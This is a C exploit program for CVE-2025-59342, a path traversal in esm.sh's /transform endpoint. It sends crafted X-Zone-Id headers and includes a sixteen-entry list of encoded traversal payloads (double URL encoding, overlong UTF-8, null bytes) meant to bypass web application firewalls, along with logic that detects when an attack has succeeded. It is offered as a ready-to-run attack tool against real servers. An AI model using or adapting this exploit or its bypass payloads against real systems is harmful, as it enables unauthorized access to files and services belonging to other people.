# Exploit Title: esm-dev 136 - Path Traversal # Date: 2025-07-11 # Exploit Author: Byte Reaper #Vendor Homepage: https://github.com/esm-dev/esm.sh # Software Link: https://github.com/esm-dev/esm.sh # CVE-2025-59342 - File : exploit.c - Date : 09/17/2025 - Target : esm-dev - Version: 136 - Target Endpoint : /transform - Target Header : X-Zone-Id - Vuln : - Run exploit : # gcc exploit.c argparse.c -o CVE-2025-59342 -lcurl # ./CVE-2025-59342 #include #include #include #include "argparse.h" #include #include #include #define FULL_URL 2500 #define P_Y 2000 #define POST_DATA 9000 int flagPort = 0; int port = 80; int selectPort = -1; int verbose = 0; int code = 1; int found = 1; int cF = 0; int s = 0; int bY = 0; int sP = 0; const char* cookies = NULL; const char* payload = NULL; void exit64bit() { int n = 0; __asm__ volatile ( "mov $0x4A, %%rax\n\t" "mov $0x1, %%rdi\n\t" "syscall\n\t" "test %%rax, %%rax\n\t" "jz .aD\n\t" "mov $0x0, %[var]\n\t" "jmp .finish\n\t" ".aD:\n\t" "mov $0x1, %[var]\n\t" ".finish:\n\t" : [var] "+r" (n) : : "rax", "rdi" ); if (n == 0) { printf("\e[0;31m[-] sys_fsync syscall Faild.\n"); fflush(stdout); } else if (n == 1) { printf("[+] sys_fsync syscall Success.\n"); } __asm__ volatile ( "mov $0x0, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "syscall\n\t" : : : "rax", "rdi" ); } struct Mem { char* buffer; size_t len; }; size_t write_cb(void* ptr, size_t size, size_t nmemb, void* userdata) { size_t total = size * nmemb; struct Mem* m = (struct Mem*)userdata; char* tmp = realloc(m->buffer, m->len + total + 1); if (!tmp) return 0; m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } int checkLen(int len, char* buf, size_t bufcap) { if (len < 0 || (size_t)len >= bufcap) { printf("\e[0;31m[-] Len is Long ! \e[0m\n"); printf("\e[0;31m[-] Len %d\e[0m\n", len); return 1; } else { printf("\e[0;34m[+] Len Is Not Long.\e[0m\n"); return 0; } return 0; } const char* payloads[] = { "..//..//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa//", "..../..../m.o.d.u.les/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/", "..\\/..\\/modules\\/transform\\/c245626ef6ca0fd9ee37759c5fac606c6ec99daa\\/", ".//.//m?odu?le?s/tran.sfo.rm/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/", "..%252f%252f..%252f%252fmodules%252f%252ftransform%252f%252fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%252f", "%252e%252e%252f%252f%252e%252e%252f%252fmodules%252f%252ftransform%252f%252fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%252f", "..%2f%2f..modules%2f%2ftransform%2f%2fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%2f", "%2e%2e%2f%2f%2e%2emodules%2f%2ftransform%2f%2fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%2f", "..%255c%255c..%255c%255cmodules%255c%255ctransform%255c%255cc245626ef6ca0fd9ee37759c5fac606c6ec99daa%255c%255c", "%252e%252e%255c%255c%252e%252e%255c%255cmodules%255c%255ctransform%255c%255cc245626ef6ca0fd9ee37759c5fac606c6ec99daa%255c%255c", "%u002e%u002e%u2215%u2215%u002e%u002e%u2215%u2215modules%u002e%u002etransform%u002e%u002ec245626ef6ca0fd9ee37759c5fac606c6ec99daa%u002e", "%u002e%u002e%u2216%u2216%u002e%u002e%u2216%u2216modules%u2216%u2216transform%u2216%u2216c245626ef6ca0fd9ee37759c5fac606c6ec99daa%u2216", "%e0%40%ae%e0%40%ae%e0%80%af%e0%80%af%e0%40%ae%e0%40%ae%e0%80%af%e0%80%afmodules%e0%80%af%e0%80%aftransform%e0%80%af%e0%80%afc245626ef6ca0fd9ee37759c5fac606c6ec99daa%e0%80%af", ".%00.//.%00.//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa/", "..;//..;//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa/", "%c0%2e%c0%2e%c0%af%c0%af%c0%2e%c0%2e%c0%af%c0%afmodules%c0%af%c0%aftransform%c0%af%c0%afc245626ef6ca0fd9ee37759c5fac606c6ec99daa%c0%af", NULL }; static void request(const char *baseurl) { CURL* curl = curl_easy_init(); const char *mes3 = "\e[0;34m[+] Create Object CURL Success.\n"; const char *mes4 = "\e[0;31m[-] Error Create Object CURL !\e[0m\n"; size_t len3 = strlen(mes3); size_t len4 = strlen(mes4); __asm__ volatile ( "cmp $0x0, %[curlO]\n\t" "je .donV\n\t" ".erD:\n\t" "mov $0x1, %%rax\n\t" "mov $0x1, %%rdi\n\t" "mov %[msg], %%rsi\n\t" "mov %[len], %%rdx\n\t" "syscall\n\t" "jmp .finishC\n\t" ".donV:\n\t" "mov $0x1, %%rax\n\t" "mov $0x1, %%rdi\n\t" "mov %[msg1], %%rsi\n\t" "mov %[len1], %%rdx\n\t" "syscall\n\t" "xor %%rdi, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "syscall\n\t" ".finishC:\n\t" : : [curlO] "r" (curl), [msg] "r" ((const char *)mes3), [len] "r" ((long)len3), [msg1] "r" ((const char*)mes4), [len1] "r" ((long)len4) : "rax", "rdi", "rsi", "rdx", "rcx", "r11", "memory" ); struct Mem response; CURLcode res; response.buffer = NULL; response.len = 0; const char* mes5 = "\e[0;34m[+] Buffer Clean Success.\e[0m\n"; size_t len5 = strlen(mes5); __asm__ volatile ( "test %[buffer], %[buffer]\n\t" "jz L_print_clean\n\t" "L_continue:\n\t" "jmp L_done\n\t" "L_print_clean:\n\t" "mov $0x1, %%rax\n\t" "mov $0x1, %%rdi\n\t" "movq %[msg13], %%rsi\n\t" "mov %[len13], %%rdx\n\t" "syscall\n\t" "L_done:\n\t" : : [buffer] "r" ((const char*)response.buffer), [msg13] "r" (mes5), [len13] "r" (len5) : "rax", "rdi", "rsi", "rdx", "rcx", "r11", "memory" ); char full[FULL_URL]; if (flagPort != 0) { const char* mes8 = "\e[0;31m[-] Select Port is NULL !\e[0m\n"; size_t len8 = strlen(mes8); __asm__ volatile ( "test %[var22], %[var22]\n\t" "jnz L_finish\n\t" "mov $1, %%rax\n\t" "mov $1, %%rdi\n\t" "mov %[msg13], %%rsi\n\t" "mov %[len13], %%rdx\n\t" "syscall\n\t" "xor %%rdi, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "syscall\n\t" "L_finish:\n\t" : : [var22] "r" (selectPort), [msg13] "r" (mes8), [len13] "r" (len8) : "rax", "rdi", "rsi", "rdx", "rcx", "r11", "memory" ); printf("\e[0;34m[+] Port Select : %d\e[0m\n", selectPort); int len1 = snprintf(full, FULL_URL, "%s:%d/transform", baseurl,selectPort); if (checkLen(len1, full, FULL_URL) == 1) { fprintf(stderr, "\e[0;31m[-] Error write base url !\e[0m\n"); exit64bit(); } printf("\e[0;34m[+] Write base URL success.\e[0m\n"); } else if (flagPort == 0) { printf("\e[0;34m[+] Auto port : %d\e[0m\n", port); int len2 = snprintf(full, FULL_URL, "%s:%d/transform", baseurl, port); if (checkLen(len2, full, FULL_URL) == 1) { fprintf(stderr, "\e[0;31m[-] Error write base url !\e[0m\n"); exit64bit(); } printf("\e[0;34m[+] Write base URL success.\e[0m\n"); } printf("[+] Base URL : %s\n", baseurl); printf("[+] Result full url : %s\n", full); char post[POST_DATA]; int len9 = snprintf(post, POST_DATA, "{\"filename\":\"cve.js\",\"lang\":\"js\",\"code\":\"console.log('Exploit!');\",\"importMap\":{\"imports\":{\"react\":\"https://esm.sh/react\",\"react-dom\":\"https://esm.sh/react-dom\"}},\"jsxImportSource\":\"react\",\"target\":\"es2022\",\"sourceMap\":\"external\",\"minify\":true}"); if (checkLen(len9, post, POST_DATA) == 1) { fprintf(stderr, "[-] Error write post data !\e[0m\n"); exit64bit(); } printf("\e[0;34m[+] Write Post data Success.\e[0m\n"); printf("\e[0;35m[+] Post data :===================================\e[0m\n"); printf("%s\n", post); printf("\e[0;32m[+] Size : %d\e[0m\n", POST_DATA); printf("\e[0;32m[+] Len : %zu\e[0m\n", strlen(post)); printf("\e[0;35m==================================================\e[0m\n"); curl_easy_setopt(curl, CURLOPT_URL, full); curl_easy_setopt(curl, CURLOPT_ACCEPT_ENCODING, ""); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); if (cF) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_POST, 1L); curl_easy_setopt(curl, CURLOPT_POSTFIELDS, post); curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, (long)strlen(post)); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); struct timespec rqtp, rmtp; rqtp.tv_sec = 1; rqtp.tv_nsec = 500000000; register long r10R asm("r10"); r10R = 0; printf("\e[0;33m[+] Sleep (%ld seconds) && (%ld nanoseconds)...\e[0m\n", rqtp.tv_sec, rqtp.tv_nsec); int ret; __asm__ volatile ( "syscall" : "=a"(ret) : "a"(0xE6), "D"((long)0), "S"((long)0), "d"(&rqtp), "r"(r10R) : "rcx", "r11", "memory" ); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); struct curl_slist* headers = NULL; headers = curl_slist_append(headers, "User-Agent: Den/8.7.1"); headers = curl_slist_append(headers, "Accept: */*"); headers = curl_slist_append(headers, "Connection: keep-alive"); headers = curl_slist_append(headers, "Content-Type: application/json"); headers = curl_slist_append(headers, "Referer: http://localhost:9999/"); if (s!=0) { printf("[+] Your Payload : %s\n", payload); printf("\e[0;33m[+] Checking payload...\n"); if (strstr(payload, "../") || strstr(payload, "..\\")) { printf("\e[0;36m[+] Detected path traversal \"../\" in payload.\n"); } else { printf("\e[0;31m[-] No path traversal detected. Please provide a valid payload.\n"); exit64bit(); } if (strstr(payload, "/transform")) { printf("\e[0;36m[+] Detected endpoint '/transform' in payload.\n"); } else { printf("\e[0;31m[-] Endpoint '/transform' not detected in payload!\n"); exit64bit();; } } else { headers = curl_slist_append(headers, "X-Zone-Id: ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/"); //auto payload printf("[+] Auto payload ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/.\n"); } curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); if (verbose) { curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } res = curl_easy_perform(curl); curl_slist_free_all(headers); if (res == CURLE_OK) { printf("\e[1;36m[+] Request sent successfully\e[0m\n"); long httpcode; double timeT; double timeR; char* urlD = NULL; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpcode); curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &timeT); curl_easy_getinfo(curl, CURLINFO_REDIRECT_TIME, &timeR); curl_easy_getinfo(curl, CURLINFO_REDIRECT_URL, &urlD); printf("\e[0;32m[+] Delayed response : %f\e[0m\n", timeT); printf("\e[0;34m[+] TIME REDIRECT: %.1f\e[0m\n", timeR); if (urlD == NULL) { printf("\e[0;36m[+] Not REDIRECT Found.\e[0m\n"); } else { printf("\e[0;34m[+] REDIRECT To : %s\e[0m\n", urlD); } printf("\e[0;32m[+] HTTP CODE : %ld\n", httpcode); if (response.buffer != NULL) { printf("\e[0;35m=============================================== [RESPONSE] ===============================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[0;32m[+] Size Pointer response : %d\e[0m\n", sizeof(response.buffer)); printf("\e[0;32m[+] Len : %zu\e[0m\n", response.len); printf("\e[0;35m==========================================================================================================\e[0m\n"); } else { printf("\e[0;31m[-] Error show buffer : NULL response !\n"); __asm__ volatile ( "mov $0x0, %%rdi\n\t" "mov $0xE7, %%rax\n\t" "syscall\n\t" : : :"rax", "rdi" ); } printf("===========================================================================================================\n"); if (httpcode >= 200 && httpcode < 300) { const char* words[] = { "Exploit!", "cve.js", "mjs", "console", "code", "map", "AAAA", "IAAI", "names", NULL }; printf("\e[0;32m[+] Http code (200 - 300)\e[0m\n"); printf("\e[0;33m[+] Check Word in response...\e[0m\n"); for (int u = 0; words[u] != NULL; u++) { code = 1; if (strstr(response.buffer, words[u]) != NULL) { printf("[+] Word found in response : %s\n", words[u]); __asm__ volatile ( "mov $0x0, %[var12]\n\t" : [var12] "=r" (found) : : ); break; } } if (found == 0) { printf("\e[0;36m[+] Words were found in the server's response, indicating that the exploitation was likely successful.\e[0m\n"); } const char *mes11 = "\e[0;31m[-] Not found words in response !\e[0m\n"; size_t len11 = strlen(mes11); __asm__ volatile ( "test %[var11], %[var11]\n" "jnz notZero\n\t" "jmp finish11\n\t" "notZero:\n\t" "mov $0x1, %%rax\n\t" "mov $0x1, %%rdi\n\t" "movq %[size11], %%rsi\n\t" "mov %[len11], %%rdx\n\t" "syscall\n\t" "finish11:\n\t" : : [var11] "r" ((int)found), [size11] "r" ((const char *)mes11), [len11] "r" (len11) :"rax", "rdi", "rsi", "rdx", "r11", "rcx", "memory" ); } else { printf("\e[0;31m[-] Http code Not range (200 - 300)\e[0m\n"); printf("\e[0;31m[-] Please check url and port.\e[0m\n"); } printf("\e[0;35m[+] Result Exploit :\e[0m\n"); if (code == 1 && found == 0) { printf("\e[0;36m[+] HTTP code positive and expected word found: Exploit succeeded (CVE-2025-59342).\e[0m\n"); } else if (code == 1 && found != 0) { printf("\e[0;36m[+] HTTP code positive but expected word not found: Partial success (CVE-2025-59342).\e[0m\n"); } else if (code != 1 && found == 0) { printf("\e[0;31m[-] HTTP code negative but word found: Unexpected result (CVE-2025-59342).\e[0m\n"); } else { printf("\e[0;31m[-] Exploitation did not succeed.\e[0m\n"); } } else { printf("\e[0;31m[-] Error Send Request !\e[0m\n"); printf("\e[0;31m[-] Error : %s\n", curl_easy_strerror(res)); exit64bit(); } curl_easy_cleanup(curl); free(response.buffer); } void bypass(const char* urlB) { struct Mem responseBypass; responseBypass.buffer = NULL; responseBypass.len = 0; const char* mes14 = "\e[0;34m[+] Buffer Clean Success.\e[0m\n"; size_t len14 = strlen(mes14); __asm__ volatile ( "test %[buffer1], %[buffer1]\n\t" "jz L_print_clean1\n\t" "L_continue1:\n\t" "jmp L_done1\n\t" "L_print_clean1:\n\t" "mov $0x1, %%rax\n\t" "mov $0x1, %%rdi\n\t" "movq %[msg14], %%rsi\n\t" "mov %[len14], %%rdx\n\t" "syscall\n\t" "L_done1:\n\t" : : [buffer1] "r" ((const char*)responseBypass.buffer), [msg14] "r" (mes14), [len14] "r" (len14) : "rax", "rdi", "rsi", "rdx", "rcx", "r11", "memory" ); CURL* curl = curl_easy_init(); if (curl == NULL) { fprintf(stderr,"[-] Error Create Object CURL !\n"); exit64bit(); } CURLcode res1; char postData[POST_DATA]; int len15 = snprintf(postData, POST_DATA, "{\"filename\":\"cve.js\",\"lang\":\"js\",\"code\":\"console.log('Exploit!');\",\"importMap\":{\"imports\":{\"react\":\"https://esm.sh/react\",\"react-dom\":\"https://esm.sh/react-dom\"}},\"jsxImportSource\":\"react\",\"target\":\"es2022\",\"sourceMap\":\"external\",\"minify\":true}"); if (checkLen(len15, postData, POST_DATA) == 1) { fprintf(stderr, "[-] Error write post data !\e[0m\n"); exit64bit(); } if (curl) { for (int i = 0; payloads[i] != NULL; i++) { struct curl_slist* h = NULL; char fullURL[FULL_URL]; snprintf(fullURL, FULL_URL, "%s/transform", urlB); char hLine[1024]; snprintf(hLine, 1024, "X-Zone-Id: %s", payloads[i]); h = curl_slist_append(h, hLine); h = curl_slist_append(h, "User-Agent: Den/8.7.1"); h = curl_slist_append(h, "Content-Type: application/json"); curl_easy_setopt(curl, CURLOPT_URL, fullURL); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h); if (cF) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_POSTFIELDS, postData); curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, (long)strlen(postData)); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &responseBypass); struct timespec rqtp, rmtp; rqtp.tv_sec = 1; rqtp.tv_nsec = 500000000; register long r10R asm("r10"); r10R = 0; printf("\e[0;33m[+] Sleep (%ld seconds) && (%ld nanoseconds)...\e[0m\n", rqtp.tv_sec, rqtp.tv_nsec); int ret; __asm__ volatile ( "syscall" : "=a"(ret) : "a"(0xE6), "D"((long)0), "S"((long)0), "d"(&rqtp), "r"(r10R) : "rcx", "r11", "memory" ); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); res1 = curl_easy_perform(curl); curl_slist_free_all(h); if (res1 == CURLE_OK) { long httpC; printf("---------------------------------------------------------------------------------------------------\n"); printf("\e[1;36m[+] Request sent successfully\e[0m\n"); printf("[+] Payload Test : %s\n", payloads[i]); curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpC); printf("[+] Http code : %ld\n", httpC); if (responseBypass.buffer != NULL) { printf("\e[0;35m=============================================== [RESPONSE] ===============================================\e[0m\n"); printf("%s\n", responseBypass.buffer); printf("\e[0;35m==========================================================================================================\e[0m\n"); if (httpC == 501 || strstr(responseBypass.buffer, "Unsupported method") != NULL) { printf("[-] Please check target URL, The server does not support the POST request.\n"); } else { __asm__ volatile("nop"); } } else { printf("[-] Response NULL !\n"); exit64bit(); } if (httpC >= 200 && httpC < 300) { if (code == 0) { printf("[+] Bypass Waf Success.\n"); } else { printf("[-] The server's response is still negative !\n"); } if (responseBypass.buffer != NULL) { printf("\e[0;35m=============================================== [RESPONSE] ===============================================\e[0m\n"); printf("%s\n", responseBypass.buffer); printf("%zu\n", responseBypass.len); printf("\e[0;35m==========================================================================================================\e[0m\n"); free(responseBypass.buffer); responseBypass.buffer = NULL; responseBypass.len = 0; } else { printf("[-] Response NULL (Bypass WAF) !\n"); exit64bit(); } } else { printf("[-] Http code Not 200-300 !\n"); printf("[+] Waf detect OR check input base url / port.\n"); } } } } else { printf("[-] Error Send Request !\n"); } curl_easy_cleanup(curl); } int main(int argc, const char** argv) { printf("\e[1;37m+-----------------------+\e[0m\n"); printf("\e[1;37m| Author : Byte Reaper |\e[0m\n"); printf("\e[1;37m| CVE : CVE-2025-59342 |\e[0m\n"); printf("\e[1;37m| Vuln : Path Traversal |\e[0m\n"); printf("\e[1;37m+-----------------------+\e[0m\n"); printf("\e[1;30m------------------------------------------------------------------------\e[0m\n"); printf("[+] Check Your os...\n"); struct utsname os; __asm__ volatile ( "mov %0, %%rdi\n\t" "mov $0x3F, %%rax\n\t" "syscall\n\t" : : "r"(&os) : "rax", "rdi" ); printf("\e[0;36m[+] System Name: %s\e[0m\n", os.sysname); printf("\e[0;36m[+] Machine : %s\e[0m\n", os.machine); if (strstr(os.sysname, "Linux") != NULL) { printf("\e[0;36m[+] Linux OS, Check Machine architecture...\e[0m\n"); } else { printf("[-] OS Not Linux 64 bit (%s),Exit...\e[0m\n", os.sysname); printf("[+] Please RUN exploit in linux.\n"); exit64bit(); } if (strstr(os.machine, "x86_64") != NULL) { printf("\e[0;36m[+] Machine architecture is 64 bit, run exploit...\e[0m\n"); } else { printf("[-] OS Not architecture 64 bit (%s), Exit...\e[0m\n", os.machine); exit64bit(); } const char* url = NULL; struct argparse_option options[] = { OPT_HELP(), OPT_STRING('u', "url", &url, "Enter Target URL."), OPT_INTEGER('p', "port", &selectPort, "Enter Target PORT."), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode."), OPT_STRING('c', "cookies", &cookies, "Enter File cookies."), OPT_STRING('k', "payload", &payload, "Enter Payload."), OPT_BOOLEAN('b', "bypass", &sP, "Arg Bypass WAF."), OPT_END() }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (!url) { printf("\e[0;31m[-] Please Enter Target IP OR URl !\e[0m\n"); printf("\e[0;31m[!] Exemple : ./CVE-2025-59342 -u http://TARGET\e[0m\n"); __asm__ volatile ( "xor %%rdi, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "1:\n\t" "syscall\n\t" : : : "rax", "rdi", "rsi" ); } if (verbose) { __asm__ volatile ( "add $0x1, %[var6]\n\t" : [var6] "+r" (verbose) : : ); } else { __asm__ volatile ( "mov $0x0, %[var7]\n\t" : [var7] "=r" (verbose) : : ); } flagPort = (selectPort != -1); if (payload != NULL) { s = 1; } else { s = 0; } if (sP) { bypass(url); } else { request(url); } printf("\e[0;36m[+] Finish Script.\n"); __asm__ volatile ("mov $0x3C, %%rax\n\t" "mov $0x0, %%rdi\n\t" "syscall\n\t" : : :"rax", "rdi" ); }